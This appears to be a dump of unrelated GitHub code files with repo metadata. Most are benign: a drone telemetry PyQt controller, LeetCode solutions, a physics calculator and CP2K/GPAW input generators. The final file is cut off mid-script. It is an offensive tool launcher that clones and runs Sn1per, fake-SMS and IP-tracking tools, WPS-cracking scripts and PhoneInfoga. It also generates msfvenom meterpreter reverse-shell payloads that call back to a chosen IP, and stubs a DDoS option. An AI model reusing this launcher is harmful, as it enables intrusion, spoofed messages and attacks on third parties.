flight_config):\r\n self._flight_config = flight_config\r\n \r\n def _receiver_channel_count_received(self, event, channel_count):\r\n self._channel_count = int(channel_count)\r\n if (self._channel_count == 5) :\r\n self._channels_label_array_text = ['Mode']\r\n elif (self._channel_count == 6) :\r\n self._channels_label_array_text = ['Mode', 'Aux1']\r\n elif (self._channel_count == 7) :\r\n self._channels_label_array_text = ['Mode', 'Aux1', 'Aux2']\r\n elif (self._channel_count == 8) :\r\n self._channels_label_array_text = ['Mode', 'Aux1', 'Aux2', 'Aux3']\r\n elif (self._channel_count == 9) :\r\n self._channels_label_array_text = ['Mode', 'Aux1', 'Aux2', 'Aux3', 'Aux4']\r\n else :\r\n self._channels_label_array_text = ['Mode', 'Aux1', 'Aux2', 'Aux3', 'Aux4', 'Aux5']\r\n \r\n transmitterScene = QtGui.QGraphicsScene()\r\n for channel in range(self._channel_count-4):\r\n barGauge = QtGui.QGraphicsRectItem()\r\n barGauge.setBrush(QtGui.QBrush(QtCore.Qt.blue, QtCore.Qt.SolidPattern))\r\n self._channel_bar_gauge_array.append(barGauge)\r\n transmitterScene.addItem(self._channel_bar_gauge_array[channel])\r\n label = transmitterScene.addText(self._channels_label_array_text[channel])\r\n label.setDefaultTextColor(QtCore.Qt.white)\r\n label.setPos(self.compute_channel_bar_location(channel), self.ui.transmitterOutput.height())\r\n self._channels_label_array_object.append(label)\r\n self.ui.transmitterOutput.setScene(transmitterScene) \r\n \r\n for channel in range(self._channel_count-4):\r\n self._update_receiver_bar_widget(channel, 1000)\r\n self._channels_label_array_object[channel].setPos(self.compute_channel_bar_location(channel) - 3, self.ui.transmitterOutput.height() - self._label_pixel_height)\r\n \r\n self.ui.transmitterOutput.centerOn(0.0, 0.0)\r\n \r\n def _motors_count_received(self, event, motors_count):\r\n self._motors_count = int(motors_count)\r\n motorScene = QtGui.QGraphicsScene()\r\n self.motor = []\r\n motorLocation = VehicleOverallStatusController.MOTORS_GAUGE_POSITION[self._flight_config]\r\n for motorIndex in range(int(motors_count)):\r\n 
self.motor.append(BarGauge('Motor ' + str(motorIndex+1)))\r\n self.motor[motorIndex].setPos(motorLocation[motorIndex][0], motorLocation[motorIndex][1])\r\n motorScene.addItem(self.motor[motorIndex])\r\n self.ui.motorView.setScene(motorScene)\r\n vehicleImage = QtGui.QPixmap(VEHICLE_CONFIG_FILE_MAP[self._flight_config])\r\n scaledImage = vehicleImage.scaled(400, 400, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)\r\n motorScene.addPixmap(scaledImage)\r\n \r\n def _motor_armed_event(self, event, are_motor_armed):\r\n if are_motor_armed :\r\n self.motorArm.setPlainText('Armed')\r\n self.motorArm.setDefaultTextColor(QtCore.Qt.green)\r\n else :\r\n self.motorArm.setPlainText('Not Armed')\r\n self.motorArm.setDefaultTextColor(QtCore.Qt.red)\r\n \r\n def _vehicle_roll_event(self, event, vehicle_roll):\r\n self._vehicle_roll = math.degrees(vehicle_roll)\r\n self.roll.setPlainText('{:.1f}'.format(self._vehicle_roll))\r\n self._update_pitch_poll_widget(self._vehicle_roll,self._vehicle_pitch)\r\n \r\n def _vehicle_pitch_event(self, event, vehicle_pitch):\r\n self._vehicle_pitch = math.degrees(vehicle_pitch)\r\n self.pitch.setPlainText('{:.1f}'.format(self._vehicle_pitch))\r\n self._update_pitch_poll_widget(self._vehicle_roll,self._vehicle_pitch) \r\n\r\n def _update_pitch_poll_widget(self, rollAngle, pitchAngle):\r\n pitchPosition = self._scale_receiver_channel_to_widget(-pitchAngle, (-135.0, 135.0), (540.0, -540.0))\r\n rollCenter = self._scale_receiver_channel_to_widget(-pitchAngle, (-135.0, 135.0), (0, 1080.0))\r\n self._horizon_background_image.setPos(0, pitchPosition)\r\n self._horizon_background_image.setTransformOriginPoint(250.0, rollCenter)\r\n self._horizon_background_image.setRotation(-rollAngle)\r\n\r\n def _vehicle_heading_event(self, event, vehicle_heading): \r\n heading = math.degrees(vehicle_heading)\r\n self.heading.setPlainText('{:.1f}'.format(heading).zfill(5))\r\n self._horizon_compass_item.setTransformOriginPoint(150.0, 150.0)\r\n self._horizon_compass_item.setRotation(-heading)\r\n \r\n def _vehicle_altitude_hold_state_event(self, event, vehicle_altitude):\r\n if vehicle_altitude == '1':\r\n self.altitudeHold.setPlainText('On')\r\n self.altitudeHold.setDefaultTextColor(QtCore.Qt.green)\r\n else:\r\n self.altitudeHold.setPlainText('Off')\r\n self.altitudeHold.setDefaultTextColor(QtCore.Qt.red)\r\n \r\n def _vehicle_altitude_event(self, event, vehicle_altitude):\r\n self.altitude.setPlainText('{:.1f}'.format(vehicle_altitude).zfill(5))\r\n \r\n def _receiver_roll_event(self, event, roll):\r\n self._receiver_roll = roll\r\n self._update_right_stick_widget(self._receiver_roll, self._receiver_pitch)\r\n \r\n def _receiver_pitch_event(self, event, pitch):\r\n self._receiver_pitch = pitch\r\n self._update_right_stick_widget(self._receiver_roll, self._receiver_pitch)\r\n \r\n def _update_right_stick_widget(self, roll, pitch):\r\n rollPosition = self._scale_receiver_channel_to_widget(roll, (1000.0, 2000.0), (-57.0, 55.0))\r\n pitchPosition = self._scale_receiver_channel_to_widget(pitch, (1000.0, 2000.0), (58.0, -57.0))\r\n self.rightStick.setPos(rollPosition, pitchPosition) \r\n \r\n def _receiver_yaw_event(self, event, yaw):\r\n self._receiver_yaw = yaw\r\n self._update_left_stick_widget(self._receiver_throttle, self._receiver_yaw)\r\n \r\n def _receiver_throttle_event(self, event, throttle):\r\n self._receiver_throttle = throttle\r\n self._update_left_stick_widget(self._receiver_throttle, self._receiver_yaw)\r\n \r\n def _update_left_stick_widget(self, throttle, yaw):\r\n 
throttlePosition = self._scale_receiver_channel_to_widget(throttle, (1000.0, 2000.0), (58.0, -57.0))\r\n yawPosition = self._scale_receiver_channel_to_widget(yaw, (1000.0, 2000.0), (-57.0, 55.0))\r\n self.leftStick.setPos(yawPosition, throttlePosition)\r\n \r\n def _scale_receiver_channel_to_widget(self, val, src, dst):\r\n return ((val - src[0]) / (src[1]-src[0])) * (dst[1]-dst[0]) + dst[0]\r\n \r\n def _receiver_mode_event(self, event, mode):\r\n self._update_receiver_bar_widget(0, mode)\r\n \r\n def _receiver_aux1_event(self, event, aux1):\r\n if self._channel_count >= 6 :\r\n self._update_receiver_bar_widget(1, aux1)\r\n \r\n def _receiver_aux2_event(self, event, aux2):\r\n if self._channel_count >= 7 :\r\n self._update_receiver_bar_widget(2, aux2)\r\n \r\n def _receiver_aux3_event(self, event, aux3):\r\n if self._channel_count >= 8 :\r\n self._update_receiver_bar_widget(3, aux3)\r\n \r\n def _receiver_aux4_event(self, event, aux4):\r\n if self._channel_count >= 9 :\r\n self._update_receiver_bar_widget(4, aux4)\r\n \r\n def _receiver_aux5_event(self, event, aux5):\r\n if self._channel_count >= 10 :\r\n self._update_receiver_bar_widget(5, aux5)\r\n \r\n def _receiver_aux6_event(self, event, aux6):\r\n if self._channel_count >= 11 :\r\n self._update_receiver_bar_widget(6, aux6)\r\n \r\n def _receiver_aux7_event(self, event, aux7):\r\n if self._channel_count >= 12 :\r\n self._update_receiver_bar_widget(7, aux7)\r\n \r\n def _motor1_throttle_event(self, event, motor1_throttle):\r\n self.motor[0].setValue(motor1_throttle)\r\n\r\n def _motor2_throttle_event(self, event, motor2_throttle):\r\n self.motor[1].setValue(motor2_throttle)\r\n\r\n def _motor3_throttle_event(self, event, motor3_throttle):\r\n self.motor[2].setValue(motor3_throttle)\r\n\r\n def _motor4_throttle_event(self, event, motor4_throttle):\r\n self.motor[3].setValue(motor4_throttle)\r\n\r\n def _motor5_throttle_event(self, event, motor5_throttle):\r\n if self._motors_count >= 6 :\r\n self.motor[4].setValue(motor5_throttle)\r\n\r\n def _motor6_throttle_event(self, event, motor6_throttle):\r\n if self._motors_count >= 6 :\r\n self.motor[5].setValue(motor6_throttle)\r\n\r\n def _motor7_throttle_event(self, event, motor7_throttle):\r\n if self._motors_count >= 8 :\r\n self.motor[6].setValue(motor7_throttle)\r\n\r\n def _motor8_throttle_event(self, event, motor8_throttle):\r\n if self._motors_count >= 8 :\r\n self.motor[7].setValue(motor8_throttle)\r\n \r\n def _flight_mode_event(self, event, flight_mode):\r\n self.flightMode.setPlainText(flight_mode)\r\n if flight_mode == 'Accro':\r\n self.flightMode.setDefaultTextColor(QtCore.Qt.yellow)\r\n else:\r\n self.flightMode.setDefaultTextColor(QtCore.Qt.green)\r\n \r\n def _battery_voltage_received(self, event, battery_voltage):\r\n self.batteryPower.setPlainText('{:.3f}'.format(battery_voltage))\r\n \r\n def start(self):\r\n self._protocol_handler.unsubscribe_command()\r\n self._protocol_handler.subscribe_vehicle_status()\r\n \r\n def stop(self):\r\n self._protocol_handler.unsubscribe_command()\r\n \r\n def _update_receiver_bar_widget(self, channel, value):\r\n output = self._scale_receiver_channel_to_widget(value, (1000.0, 2000.0), (25.0, self._window_height - 10)) - self._label_pixel_height\r\n self._channel_bar_gauge_array[channel].setRect(self.compute_channel_bar_location(channel), self._window_height-(output + self._label_pixel_height), self._motor_gauge_pixel_width, output)\r\n\r\n def compute_channel_bar_location(self, channel):\r\n barPosition = (self.ui.transmitterOutput.width() 
- (self._motor_gauge_pixel_width * self._channel_count)) / (self._channel_count + 1)\r\n location = ((channel + 1) * barPosition) + (channel * self._motor_gauge_pixel_width)\r\n return location\r\n\r\n def resizeEvent(self, event):\r\n self._window_height = self.ui.transmitterOutput.height()\r\n self.windowWidth = self.ui.transmitterOutput.width()\r\n self.ui.transmitterOutput.setSceneRect(0, 0, self.windowWidth*2, self._window_height*2)\r\n self.ui.transmitterOutput.centerOn(0,0)\r\n for channel in range(self._channel_count-4):\r\n self._update_receiver_bar_widget(channel, 1000)\r\n self._channels_label_array_object[channel].setPos(self.compute_channel_bar_location(channel) - 3, self.ui.transmitterOutput.height() - self._label_pixel_height)\r\n\r\n","repo_name":"AeroQuad/AeroQuadConfiguratorPyQt","sub_path":"ui/subpanel/vehicleoverallstatus/VehicleOverallStatusController.py","file_name":"VehicleOverallStatusController.py","file_ext":"py","file_size_in_byte":22855,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"13297251718","text":"'''\nGiven an array nums of n integers, return an array of all the unique quadruplets [nums[a], nums[b], nums[c], nums[d]] such that:\n\n0 <= a, b, c, d < n\na, b, c, and d are distinct.\nnums[a] + nums[b] + nums[c] + nums[d] == target\nYou may return the answer in any order.\n\n \n\nExample 1:\n\nInput: nums = [1,0,-1,0,-2,2], target = 0\nOutput: [[-2,-1,1,2],[-2,0,0,2],[-1,0,0,1]]\nExample 2:\n\nInput: nums = [2,2,2,2,2], target = 8\nOutput: [[2,2,2,2]]\n'''\n\n\nclass Solution:\n def fourSum(self, nums, target: int):\n nums = sorted(nums)\n n = len(nums)\n result = []\n for i in range(n-3):\n if i == 0 or nums[i] != nums[i-1]:\n for j in range(i+1, n-2):\n if nums[j] != nums[j-1] or j-1 == i:\n seen = set()\n seen3 = set()\n for k in range(j+1,n):\n if nums[k] in seen3:\n continue\n \n complement = target - nums[i]-nums[j]-nums[k]\n \n if complement in seen:\n result.append([nums[i], nums[j], nums[k], complement])\n seen3.add(nums[k])\n else:\n seen.add(nums[k])\n return result\n\n ","repo_name":"haruna99/DSA_Questions_and_Answers","sub_path":"hashtables and hashsets/4sum.py","file_name":"4sum.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1520611950","text":"while True:\r\n choice = input(\"fnet, mass, acceleration?: \").lower()\r\n\r\n if choice == \"fnet\":\r\n Mass= int(input(\"mass?\\n\"))\r\n acceleration= int(input(\"acceleration?\\n\"))\r\n Fnet = (Mass*acceleration)\r\n print(f\"Fnet is equal to {Fnet}\")\r\n\r\n if choice == \"mass\":\r\n fnet= int(input(\"fnet?\\n\"))\r\n acceleration= int(input(\"acceleration?\\n\"))\r\n mass = (fnet/acceleration)\r\n print(f\"mass is equal to {mass}\")\r\n\r\n if choice == \"acceleration\":\r\n fnet= int(input(\"fnet?\\n\"))\r\n mass= int(input(\"mass?\\n\"))\r\n acceleration = (fnet/mass)\r\n print(f\"acceleration is equal to {acceleration}\")\r\n \r\n again = input(\"again? 
(yes/no): \").lower()\r\n \r\n if again !=\"yes\":\r\n break\r\nprint(\"ok bye\")\r\n","repo_name":"Nmuhra/Math-physics-tools","sub_path":"Fnet.py","file_name":"Fnet.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40069686624","text":"from pymatgen.io.ase import AseAtomsAdaptor\nimport numpy as np\nimport ase.io, os\n\ndef xTB_input(calc_type = \"vcopt\", prefix = \"xtb\", cif_name = None,\n atoms = None, xtb_path = None, d3_path = None):\n\n \"\"\"\n Generate input file for xTB calculation (as implemented in CP2K).\n\n You must either set XTB_D3_PATH, and XTB_PARAMS_PATH as environment\n variables, or pass them into the relevant keywords (see below).\n\n Recommended to add e.g.\n export XTB_D3_PATH=/path/to/dftd3.dat\n export XTB_PARAMS_PATH=/path/to/xTB_parameters\n to your shell profile. If you do this, python will parse your \n environment variables for these file paths, and passing to the\n funtion is not needed.\n\n This function has two modes:\n ---------------------------MODE 1--------------------------------------\n calc_type = \"custom\" | Where you bring your own template file, and set this\n in the template kwarg. You can use the replace dictionary to store patterns\n for replacement with information about your system.\n\n E.g. replace = {\"@halogen_corr\":\".TRUE.\"} will search for @halogen_corr\n within your template file, and replace it with .TRUE. when generating\n the input file. \n ---------------------------MODE 1--------------------------------------\n\n ---------------------------MODE 2--------------------------------------\n calc_type = \"vcopt\", \"opt\", \"md\", \"scf\" | Where you use one of the\n default files contained explicitly, line for line in this function. \n\n The template used is determined by calc_type. The only things that will\n be determined on the fly are UKS (if nelect is odd) and the cif_file used\n to provide CP2K with cell parameters and atomic coordinates.\n\n Feel free to take these templates, modify them manually, and swap to \n calc_type = \"custom\" mode for more control over the templating. In fact\n this is encouraged, as the default templates are OVERLY general, and\n certainly not optimized for any particular system.\n ---------------------------MODE 2--------------------------------------\n\n Parameters:\n ----------\n calc_type (str)\n Type of calculation. Default is \"vcopt\". This\n is currently also the only option aside from \"custom\". See above.\n\n prefix (str)\n Prefix for output files. Default is \"xtb\". If a cif_name is not\n provided, but an Atoms object is, a cif of the form:\n f'{prefix}_{calc_type}.cif' will be generated and used to feed to\n CP2K.\n\n atoms (ase.Atoms)\n Atoms object to be used to generate cif file. If this is not\n provided, a cif_name must be provided. Don't provide cif_name\n if atoms are being passed.\n\n cif_name (str)\n Name of cif file to be used to feed to CP2K. If this is not\n provided, an atoms must be provided. 
Don't provide\n atoms if cif_name is being passed.\n \n Returns:\n -------\n None, generates input file:\n f'{prefix}_{calc_type}.inp'\n \"\"\"\n\n assert cif_name is not None or atoms is not None, \\\n \"Must provide either cif_name or atoms\"\n\n assert cif_name is None or atoms is None, \\\n \"Must provide either cif_name or atoms, not both\"\n\n\n # If no cif, needs to be written.\n if atoms is not None:\n cif_name = f'{prefix}_{calc_type}.cif'\n atoms.write(cif_name)\n\n # Let's try to use pymatgen to write the cif file.\n # Doesn't work\n # AseAtomsAdaptor().get_structure(atoms).to(filename=cif_name,\n # fmt=\"cif\")\n os.system(f\"obabel {cif_name} -O {cif_name}\")\n\n # Determins if UKS is needed.\n if _count_electrons(atoms) % 2 == 1:\n UKS = \".TRUE.\"\n else:\n UKS = \".FALSE.\"\n else:\n if _count_electrons(cif_name) % 2 == 1:\n UKS = \".TRUE.\"\n else:\n UKS = \".FALSE.\"\n\n\n # Checks kwargs\n if xtb_path is None:\n xtb_err_string = \"Must provide path to xTB parameters file either\" \\\n \"as an environment variable, or to the function.\\n\" \\\n \"See help(xTB_input) for more information.\"\n\n\n # Checks environment variables, raises error if unset.\n xtb_path = os.getenv(\"XTB_PARAMS_PATH\")\n if xtb_path is None:\n raise ValueError(xtb_err_string)\n else:\n if type(xtb_path) == str:\n if len(xtb_path) == 0:\n raise ValueError(xtb_err_string)\n\n\n # Checks kwargs\n if d3_path is None:\n d3_err_string = \"Must provide path to D3 parameters file either\" \\\n \"as an environment variable, or to the function.\\n\" \\\n \"See help(xTB_input) for more information.\"\n\n # Checks environment variables, raises error if unset.\n d3_path = os.getenv(\"XTB_D3_PATH\")\n if d3_path is None:\n raise ValueError(d3_err_string)\n else:\n if type(d3_path) == str:\n if len(d3_path) == 0:\n raise ValueError(d3_err_string)\n\n\n\n if calc_type == \"vcopt\":\n with open(f\"{prefix}_vcopt.inp\", \"w\") as fil:\n fil.write(f\"\"\"\\\n&FORCE_EVAL\n &DFT\n\tUKS {UKS}\n &QS\n METHOD xTB\n &xTB\n DO_EWALD T\n CHECK_ATOMIC_CHARGES F\n COULOMB_INTERACTION T\n &PARAMETER\n DISPERSION_PARAMETER_FILE {d3_path}\n PARAM_FILE_NAME {xtb_path}\n &END PARAMETER\n USE_HALOGEN_CORRECTION .TRUE.\n &END\n\n &DISTRIBUTION\n BASIC_OPTIMIZATION .FALSE.\n BASIC_SPATIAL_OPTIMIZATION .TRUE.\n &END\n \n &END QS\n &POISSON\n POISSON_SOLVER PERIODIC\n PERIODIC XYZ\n &END\n\n &SCF\n SCF_GUESS ATOMIC\n EPS_SCF 1.e-8\n &OT\n PRECONDITIONER FULL_SINGLE_INVERSE\n MINIMIZER DIIS\n\t\t ENERGY_GAP .03 ! A conservative ~.8 eV for most perovskites.\n &END\n MAX_SCF 500\n &END SCF\n\n &END DFT\n\n STRESS_TENSOR ANALYTICAL\n\n &SUBSYS\n &CELL\n CELL_FILE_FORMAT CIF\n CELL_FILE_NAME {cif_name}\n &END CELL\n &TOPOLOGY\n COORD_FILE_NAME {cif_name}\n COORD_FILE_FORMAT CIF\n\n &GENERATE \n !REORDER T \n &END GENERATE\n\n &END TOPOLOGY\n &END SUBSYS\n\n&END FORCE_EVAL\n\n&GLOBAL\n PROJECT_NAME {prefix}_{calc_type}\n RUN_TYPE CELL_OPT\n PRINT_LEVEL MEDIUM\n&END GLOBAL\n\n&MOTION\n &CELL_OPT\n MAX_ITER 500\n KEEP_SYMMETRY .TRUE.\n\tKEEP_ANGLES .TRUE.\n &END\n &GEO_OPT\n OPTIMIZER CG \n MAX_ITER 5000\n MAX_FORCE 9.7225D-4 \n TYPE MINIMIZATION\n &END\n &PRINT\n &FORCES ON\n &END FORCES\n &END PRINT\n&END\n\n \"\"\")\n\ndef GPAW_input(calc_type = \"fcopt\", prefix = \"gpaw\", cif_name = None,\n atoms = None, opt_algo = \"FIRE\", fmax = .02):\n\n \"\"\"\n Generates basic GPAW input file. Feel free to use as a template for the\n specific calculations you want to run. 
There are a lot of things that \n can speed up this type of calculation which are a bit too specific to\n include in a general template like the one used below.\n\n Parameters\n ----------\n calc_type : str\n Type of calculation to run. Options are \"fcopt\" currently.\n prefix : str\n Prefix for all output files.\n cif_name : str\n Name of cif file to use. If None, atoms must be provided.\n atoms : ase.Atoms\n Atoms object to use. If None, cif_name must be provided.\n opt_algo : str\n Optimization algorithm to use. Options are \"FIRE\" and \"BFGS\".\n fmax : float\n Force convergence criteria for optimization (in eV/Angstrom).\n\n Returns\n -------\n None, generates input file:\n f'{prefix}_{calc_type}.py'\n \"\"\"\n\n assert cif_name is not None or atoms is not None, \\\n \"Must provide either cif_name or atoms\"\n\n assert cif_name is None or atoms is None, \\\n \"Must provide either cif_name or atoms, not both\"\n\n if atoms is not None:\n cif_name = f'{prefix}_{calc_type}.cif'\n atoms.write(cif_name)\n\n\n kpt_str = \"kpts={'density': 6.0, 'gamma': True},\"\n par_str = \"parallel={'sl_auto': True},\"\n\n if calc_type == \"fcopt\":\n with open(f\"{prefix}_fcopt.py\", \"w\") as fil:\n fil.write(f\"\"\"\\\n\nfrom ase.optimize import BFGS, FIRE\nfrom gpaw import GPAW, PW\nimport ase.io, sys\n\ncurr_structure = ase.io.read('{cif_name}')\n\ncalc = GPAW(xc='PBE',\n mode=PW(450, dedecut='estimate'),\n {kpt_str}\n {par_str}\n txt= '{prefix}' + '_fixopt.txt')\n\ncurr_structure.calc = calc\nfix_relax = BFGS(curr_structure)\nfix_relax.run(fmax={fmax})\n\ncurr_structure.write('{prefix}' + '_OPT.cif')\n \"\"\")\n\n\n\n\ndef _count_electrons(cif):\n \"\"\"Count the number of electrons in a CIF file or Atoms object.\n\n Parameters\n ----------\n\n cif : str or Atoms object\n The CIF file or Atoms object to count electrons of.\n\n Returns\n -------\n Z : int\n The number of electrons in the CIF file or Atoms object.\n \"\"\"\n \n if type(cif) == str:\n atoms = ase.io.read(cif)\n else:\n atoms = cif.copy()\n\n return(int(np.sum(atoms.get_atomic_numbers())))\n\n","repo_name":"r2stanton/pyrovskite","sub_path":"pyrovskite/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":9191,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"5680514115","text":"class Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n\n n = len(matrix)\n res = []\n m = len(matrix[0])\n for i in range(m):\n t = []\n for j in matrix:\n t.append(j[i])\n t = t[::-1]\n res.append(t) \n matrix[:] = res","repo_name":"aashif000/MY_LEET_CODE_SOLUTIONS","sub_path":"48-rotate-image/rotate-image.py","file_name":"rotate-image.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25492716538","text":"\n# def flatNestedList(input):\n# res = []\n# for i in input:\n# if isinstance(i, list):\n# res += flatNestedList(i)\n# else:\n# res.append(i)\n# return res\n\n# input = [[1,1],2,[1,0,[3,4,5,[7,8,9,[11,12]]],1]]\n\n# if __name__ == '__main__':\n# res = flatNestedList(input)\n# print(res)\n\n# def flatNestedList(input):\n# for i in input:\n# if isinstance(i, list):\n# flatNestedList(i)\n# else:\n# res.append(i)\n\n# input = [[1,1],2,[1,1]]\n# res = []\n\n# if __name__ == '__main__':\n# flatNestedList(input)\n# print(res)\n\n# \"\"\"\n# This is the interface that allows for creating nested lists.\n# 
You should not implement it, or speculate about its implementation\n# \"\"\"\n#class NestedInteger:\n#    def isInteger(self) -> bool:\n#        \"\"\"\n#        @return True if this NestedInteger holds a single integer, rather than a nested list.\n#        \"\"\"\n#\n#    def getInteger(self) -> int:\n#        \"\"\"\n#        @return the single integer that this NestedInteger holds, if it holds a single integer\n#        Return None if this NestedInteger holds a nested list\n#        \"\"\"\n#\n#    def getList(self) -> [NestedInteger]:\n#        \"\"\"\n#        @return the nested list that this NestedInteger holds, if it holds a nested list\n#        Return None if this NestedInteger holds a single integer\n#        \"\"\"\n\nclass NestedIterator:\n    def __init__(self, nestedList):\n        self.nestedList = nestedList\n        self.result = self.getFlatList(self.nestedList)\n        self.index = 0\n    \n    def getFlatList(self, nestedList):\n        result = []\n        for i in nestedList:\n            if isinstance(i, list):\n                result += self.getFlatList(i)\n            else:\n                result.append(i)\n        return result\n    \n    def next(self) -> int:\n        self.index += 1\n        if self.index <= len(self.result):\n            return self.result[self.index - 1]\n    \n    def hasNext(self) -> bool:\n        if self.index < len(self.result):\n            return True\n        else:\n            return False\n\n\nif __name__ == '__main__':\n    input = [[1,1],2,[1,0,[3,4,5,[7,8,9,[11,12]]],1]]\n    test = NestedIterator(input)\n    result = []\n    while test.hasNext():\n        result.append(test.next())\n    print(result)","repo_name":"zhanghaofeng/junos-automation","sub_path":"python/flatten_nested_list.py","file_name":"flatten_nested_list.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"45211618453","text":"import os\r\nimport time\r\nimport json\r\nimport subprocess\r\nimport webbrowser\r\nimport socket\r\n\r\n# <--Return to Menu-->\r\ndef start_menu():\r\n    os.system(\"clear\")\r\n    print(banner)\r\n    decoracion()\r\n# <----sn1per---->\r\ndef sn1per():\r\n    os.system(\"git clone https://github.com/1N3/Sn1per\")\r\n    os.system(\"cd Sn1per && sudo bash install.sh\")\r\n# <---- Check IP ---->\r\ndef comprIP():\r\n    nombre_equipo = socket.gethostname()\r\n    direccion_equipo = socket.gethostbyname(nombre_equipo)\r\n    print(\"n-host\" + nombre_equipo)\r\n    print(\"IP:\" + direccion_equipo)\r\n    time.sleep(5)\r\n    os.system(\"clear\")\r\n    decoracion()\r\n    start_menu()\r\n# <---- Send fake SMS ---->\r\ndef fakesms():\r\n    os.system(\"clear\")\r\n    print(banner)\r\n    print(\" | 1 -->> Download Tool\")\r\n    print(\" | 2 -->> Execute Tool\")\r\n    print(\" | 3 -->> Exit\")\r\n    option = input(\" ↳ \")\r\n    if option == \"1\": \r\n        os.system(\"git clone https://github.com/Darkmux/DarkSMS\")\r\n        print(\"Downloaded!!!\")\r\n        time.sleep(1)\r\n        while True:\r\n            fakesms()\r\n    if option == \"2\":\r\n        os.system(\"mv DarkSMS/* .\")\r\n        os.system(\"bash darksms.sh\")\r\n    if option == \"3\":\r\n        os.system(\"clear\")\r\n        decoracion()\r\n        start_menu()\r\n\r\n# <--IPtracker-->\r\ndef IPtracker():\r\n    os.system(\"clear\")\r\n    red()\r\n    print(banner)\r\n    purple()\r\n    print(\" | 1 -->> Download Tool\")\r\n    print(\" | 2 -->> Execute Tool\")\r\n    print(\" | 3 -->> Exit\")\r\n    option = input(\" ↳ \")\r\n    if option == \"1\":\r\n        os.system(\"git clone https://github.com/JasonJerry/IPtracker\")\r\n        print(\"Downloaded!!!\")\r\n        time.sleep(1)\r\n        while True:\r\n            IPtracker()\r\n    if option == \"2\":\r\n        os.system(\"mv IPtracker/* .\")\r\n        os.system(\"bash iptracker.sh\")\r\n    if option == 
\"3\":\r\n os.system(\"clear\")\r\n decoracion()\r\n start_menu()\r\ndef msf():\r\n os.system(\"clear\")\r\n print(banner)\r\n print(\" | 1 -->> Windows reverse shell\")\r\n print(\" | 2 -->> Linux reverse shell x86\")\r\n print(\" | 3 -->> Linux reverse shell x64\")\r\n print(\" | 4 -->> Exit\")\r\n option = input(\" ↳ \")\r\n\r\n if option == \"1\":\r\n \r\n print(\"\")\r\n ip = input(\"IP -->> \")\r\n port = input(\"PORT ->> \")\r\n yellow()\r\n print(\"Creating payload...\")\r\n os.system(\"msfvenom -p windows/meterpreter/reverse_tcp LHOST=\"+ip+\" LPORT=\"+port+\" -f exe > download.exe\")\r\n red()\r\n print(\"FileName == download.exe\")\r\n time.sleep(2)\r\n while True:\r\n msf()\r\n\r\n if option == \"2\":\r\n print(\"\")\r\n ip = input(\"IP -->> \")\r\n port = input(\"PORT ->>\")\r\n yellow()\r\n print(\"Creating payload...\")\r\n os.system(\"msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=\"+ip+\" LPORT=\"+port+\" -f elf > downloadx86.elf\")\r\n red()\r\n print(\"FileName == downloadx86.elf\")\r\n time.sleep(2)\r\n while True:\r\n msf()\r\n\r\n if option == \"3\":\r\n\r\n print(\"\")\r\n ip = input(\"IP -->> \")\r\n port = input(\"PORT ->> \")\r\n yellow()\r\n print(\"Creating payload...\")\r\n os.system(\"msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=\"+ip+\" LPORT=\"+port+\" -f elf > downloadx64.elf\")\r\n red()\r\n time.sleep(2)\r\n print(\"FileName == downloadx64.elf\")\r\n while True:\r\n msf()\r\n\r\n if option == \"4\":\r\n decoracion()\r\n start_menu()\r\ndef Ghostf():\r\n os.system(\"clear\")\r\n print(banner)\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute Tool\")\r\n print(\" | 3 -->> Exit\\n\")\r\n option = input(\"-->: \")\r\n if option == \"1\":\r\n os.system(\"git clone https://github.com/ParikhKadam/ghost-1\")\r\n os.system(\"cd ghost-1\")\r\n os.system(\"chmod +x install.sh\")\r\n os.system(\"sudo bash install.sh\")\r\n time.sleep(5)\r\n while True:\r\n Ghostf()\r\n if option == \"2\":\r\n os.system(\"./ghost\")\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n start_menu()\r\ndef Goyscript():\r\n os.system(\"clear\")\r\n purple()\r\n print(banner)\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" 2 -->> Execute Tool \")\r\n print(\" 3 -->> Exit \")\r\n option = input(\" ↳ \")\r\n if option == \"1\":\r\n os.system(\"git clone https://github.com/0x90/wps-scripts\")\r\n yellow()\r\n print(\"Downloaded!!!\")\r\n time.sleep(5)\r\n while True:\r\n Goyscript()\r\n if option == \"2\":\r\n os.system(\"cd wps-scripts/goyscript\")\r\n os.system(\"chmod +x conectar.sh\")\r\n os.system(\"sudo bash conectar.sh\")\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n start_menu()\r\ndef phoneinfoga():\r\n os.system(\"clear\")\r\n purple()\r\n print(banner)\r\n red()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" 2 -->> Execute Tool \")\r\n print(\" 3 -->> Exit \")\r\n option = input(\" ↳ \")\r\n if option == \"1\":\r\n os.system(\"git clone https://github.com/sundowndev/PhoneInfoga\")\r\n os.system(\"cd PhoneInfoga/\")\r\n os.system(\"python3 -m pip install -r requirements.txt\")\r\n purple()\r\n print(\"Downloaded!!\")\r\n time.sleep(3)\r\n while True:\r\n phoneinfoga()\r\n \r\n if option == \"2\":\r\n os.system(\"cd PhoneInfoga/\")\r\n print(\"the phoneinfoga commands are:python3 phoneinfoga scan +number\")\r\n print(\"example: python3 phoneinfoga scan +36897153568\")\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n decoracion()\r\n start_menu()\r\ndef ddos():\r\n 